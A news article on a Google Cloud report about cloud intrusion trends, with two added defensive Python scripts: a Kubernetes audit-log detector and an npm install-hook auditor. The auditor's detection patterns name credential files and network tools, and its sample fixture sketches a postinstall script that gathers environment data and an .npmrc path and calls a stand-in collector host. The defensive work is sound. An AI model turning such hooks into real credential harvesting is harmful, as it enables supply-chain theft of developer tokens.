Cloud Security Threats Shift from Credential Abuse to Software Vulnerabilities

Cloud Intrusions Shift Toward Software Vulnerabilities and Identity Compromise

A recent report from Google Cloud highlights a significant shift in the tactics used by attackers to gain access to cloud and SaaS environments. The report, which covers incident response and intelligence findings from the second half of 2025, reveals that unpatched software vulnerabilities have become the primary initial access path, overtaking weak or absent credentials.

According to the report, attackers are increasingly targeting externally exposed applications and exploiting known vulnerabilities with limited interaction. Remote code execution has become a significant portion of this software-driven access, reflecting the automated exploitation of application-layer flaws and internet-facing services. The window between vulnerability disclosure and mass exploitation has collapsed from weeks to days, with threat actors deploying cryptocurrency miners within approximately 48 hours of public disclosure.

While credential abuse remains common, the leading position of software exploitation highlights the importance of application security, patch cycles, and hardening of public services. Matt Saunders, VP DevOps at Adaptavist, notes that the increased use of AI-based attacks is a major contributor to this trend.

“Rogue organizations are using tools to find and exploit weaknesses in critical, often open-source software on which all modern stacks are built, and AI is now a huge part of that.”

Identity Compromise and Malicious Insiders

Identity compromise continues to underpin most intrusions involving cloud and SaaS environments. Threat actors are using social engineering and stolen authentication material to move through trusted access channels. Voice-based phishing has played a central role, with attackers impersonating internal staff and support personnel to pressure help desks and users into resetting credentials and altering MFA settings. Token theft has also featured prominently, with compromised OAuth tokens and other authentication artifacts enabling access without traditional login phishing.

Malicious insiders are also shifting their focus toward cloud storage, with data exfiltration becoming the dominant form of misconduct. Reviews of malicious insider cases show that cloud services are playing a growing role in how insiders remove information. Corporate cloud environments and personally controlled cloud storage have become common destinations for sensitive data.

Notable Examples and Emerging Threats

In a notable example, North Korean actors used a trojanized application to gain a foothold on a developer workstation and leveraged authenticated sessions and available credentials to pivot into cloud resources. The attackers modified Kubernetes deployment configurations to execute attacker-controlled commands and stole high-privilege service account tokens to escalate privileges and move laterally into sensitive systems.
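The two Kubernetes behaviours described above (a deployment's container command being rewritten, and service account tokens being obtained) both leave a trace in the API server audit log. The following is an added example, not code from the report or from Google Cloud, that scans Kubernetes audit events for those patterns; the allowlist of principals, the namespace and resource names, and the sample audit lines are all constructed for illustration.

```python
"""Flag suspicious Kubernetes API activity in audit log lines (JSON, one event per line)."""
import json

# Principals expected to modify workloads or mint tokens. Assumed for this example;
# in practice this would come from the cluster's CI/CD and controller inventory.
ALLOWED_PRINCIPALS = {
    "system:serviceaccount:ci:deployer",
    "system:kube-controller-manager",
}


def _find_exec_keys(obj, path=""):
    """Yield (json_path, value) for every 'command' or 'args' list in a request body.

    Works for both full-object updates and strategic-merge patch fragments, because
    it walks whatever subset of the Deployment spec the request contains."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            sub_path = f"{path}.{key}" if path else key
            if key in ("command", "args") and isinstance(value, list):
                yield sub_path, value
            else:
                yield from _find_exec_keys(value, sub_path)
    elif isinstance(obj, list):
        for index, value in enumerate(obj):
            yield from _find_exec_keys(value, f"{path}[{index}]")


def analyze_event(event):
    """Return a list of finding strings for one audit event dict."""
    findings = []
    user = event.get("user", {}).get("username", "<unknown>")
    verb = event.get("verb")
    ref = event.get("objectRef", {})
    resource, subresource = ref.get("resource"), ref.get("subresource")
    target = f"{ref.get('namespace', '-')}/{ref.get('name', '-')}"
    if user in ALLOWED_PRINCIPALS:
        return findings  # known automation; see the note on its limits below

    # 1. A Deployment update/patch that sets a container command or args.
    if resource == "deployments" and verb in ("update", "patch"):
        for path, value in _find_exec_keys(event.get("requestObject") or {}):
            findings.append(f"{user} set {path}={value!r} on deployment {target}")

    # 2. A token minted for a service account via the TokenRequest subresource.
    if resource == "serviceaccounts" and subresource == "token" and verb == "create":
        findings.append(f"{user} requested a token for service account {target}")

    # 3. Direct reads of Secrets, where long-lived service account tokens live.
    if resource == "secrets" and verb in ("get", "list"):
        findings.append(f"{user} read secret(s) {target}")
    return findings


def analyze_log(lines):
    """Run analyze_event over an iterable of JSON audit lines, skipping blanks."""
    findings = []
    for line in lines:
        if line.strip():
            findings.extend(analyze_event(json.loads(line)))
    return findings


# Constructed sample audit events (not real cluster data).
SAMPLE_AUDIT_LINES = [
    json.dumps({"user": {"username": "system:serviceaccount:ci:deployer"}, "verb": "patch",
                "objectRef": {"resource": "deployments", "namespace": "prod", "name": "api"},
                "requestObject": {"spec": {"template": {"spec": {"containers": [
                    {"name": "api", "image": "registry.example/api:1.2.3"}]}}}}}),
    json.dumps({"user": {"username": "dev-alice"}, "verb": "patch",
                "objectRef": {"resource": "deployments", "namespace": "prod", "name": "api"},
                "requestObject": {"spec": {"template": {"spec": {"containers": [
                    {"name": "api", "command": ["/bin/sh", "-c", "sleep 3600"]}]}}}}}),
    json.dumps({"user": {"username": "dev-alice"}, "verb": "create",
                "objectRef": {"resource": "serviceaccounts", "subresource": "token",
                              "namespace": "kube-system", "name": "cluster-admin-sa"}}),
    json.dumps({"user": {"username": "dev-alice"}, "verb": "get",
                "objectRef": {"resource": "secrets", "namespace": "prod", "name": "db-creds"}}),
    json.dumps({"user": {"username": "system:kube-controller-manager"}, "verb": "list",
                "objectRef": {"resource": "secrets", "namespace": "prod"}}),
]

if __name__ == "__main__":
    for finding in analyze_log(SAMPLE_AUDIT_LINES):
        print(finding)
```

The allowlist is the weak point of this rule: the report's scenario involves stolen tokens belonging to legitimate service accounts, which an allowlist by username alone will wave through. In production the same three checks should be paired with baselines on the event's `sourceIPs` and `userAgent` fields for allowlisted principals, so a trusted identity acting from an unexpected host still surfaces. Running the script on the constructed sample prints three findings, all attributed to the non-allowlisted user.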

The report also highlights the increasing use of AI-driven supply chain techniques, where compromised Node Package Manager packages are used to harvest environment data and authentication tokens from developer workstations. Stolen GitHub personal access tokens have enabled unauthorized access to source code repositories, and overly permissive cloud roles have allowed the deployment of new infrastructure and the creation of administrative privileges.
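The npm supply-chain technique described above relies on lifecycle hooks (`preinstall`, `postinstall` and similar) that run automatically when a package is installed. A defender can review a dependency before trusting it by checking whether any of those hooks, or the scripts they invoke, touch the environment, the home directory, credential files, or the network. The code below is an added example written for this article, not tooling from the report or from npm; the pattern list, the manifest and the `setup.js` contents are constructed for illustration.

```python
"""Audit an npm package manifest for install-time hooks that look like credential harvesting."""
import json
import re

# Lifecycle scripts npm runs without any user action during installation.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic indicators; each is (regex, reason). Constructed for this example and
# deliberately broad, so treat a match as a prompt for manual review, not a verdict.
SUSPICIOUS = [
    (re.compile(r"process\.env\b"), "reads the process environment"),
    (re.compile(r"os\.homedir\(\)|\$HOME\b|~/"), "touches the home directory"),
    (re.compile(r"\.npmrc|\.aws/credentials|\.git-credentials|\.ssh/"), "references credential files"),
    (re.compile(r"\b(curl|wget)\b|https?://|fetch\(|https?\.request"), "makes network calls during install"),
    (re.compile(r"child_process|\beval\(|Buffer\.from\([^)]*'base64'"), "spawns processes or decodes hidden payloads"),
]


def audit_package(package_json, files):
    """Return (hook, location, reason) tuples for a manifest and the files its hooks run.

    package_json: the text of package.json.
    files: dict mapping a file name in the package to its contents, used to follow
           hooks of the form `node <file>` into the script they execute."""
    manifest = json.loads(package_json)
    scripts = manifest.get("scripts", {})
    findings = []
    for hook in INSTALL_HOOKS:
        command = scripts.get(hook)
        if command is None:
            continue
        # Inspect the hook command itself, then any local script it hands to node.
        texts = [(f"scripts.{hook}", command)]
        for match in re.finditer(r"\bnode\s+(\S+)", command):
            script_name = match.group(1)
            if script_name in files:
                texts.append((script_name, files[script_name]))
        for location, text in texts:
            for pattern, reason in SUSPICIOUS:
                if pattern.search(text):
                    findings.append((hook, location, reason))
    return findings


# Constructed sample: a manifest whose postinstall hook runs a bundled script.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "example-helper",
    "version": "0.0.1",
    "scripts": {"postinstall": "node setup.js", "test": "jest"},
})

# Constructed fragment standing in for the bundled script; it is not a working program.
SAMPLE_FILES = {
    "setup.js": """
const os = require('os');
const payload = { env: process.env, rc: os.homedir() + '/.npmrc' };
https.request({ host: 'collector.invalid' });
""",
}

# Constructed benign manifest: a prepare hook that only compiles TypeScript.
BENIGN_PACKAGE_JSON = json.dumps({
    "name": "example-lib",
    "version": "1.0.0",
    "scripts": {"prepare": "tsc -p .", "test": "jest"},
})

if __name__ == "__main__":
    for hook, location, reason in audit_package(SAMPLE_PACKAGE_JSON, SAMPLE_FILES):
        print(f"[{hook}] {location}: {reason}")
    print("benign findings:", audit_package(BENIGN_PACKAGE_JSON, {}))
```

Run against the constructed sample, the audit reports four reasons for the `postinstall` hook, all located in `setup.js` rather than in the one-line hook command, and nothing for the benign manifest. The same review step fits naturally in CI before a lockfile update is merged, which is the kind of automated governance the article's closing quote calls for; the complementary controls on the page's other point, overly permissive cloud roles, are scoping the tokens a developer workstation holds so that a harvested token cannot create infrastructure or grant administrative privileges.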

Saunders notes that defensive posture needs to adjust to address these emerging threats. “To fight against this, organizations need to keep up with these techniques, and also limit the blast radius of any potential attack. Zero-trust security approaches are more important than ever, making sure that systems that could be used as a transport for an attack are running with the fewest privileges they need. A robust incident management process to address potential threats and real attacks is also critical.”

The report emphasizes the need for organizations to prioritize application security, patch cycles, and hardening of public services. As Saunders concludes, “The pressure to deliver software faster and safer never stops, and everyone needs to step up on automating governance to catch changes, including weaknesses, potential attack routes, and actual hackers trying to get in. Just bolting this over the top isn’t enough anymore; it needs to be standard practice for everyone.”
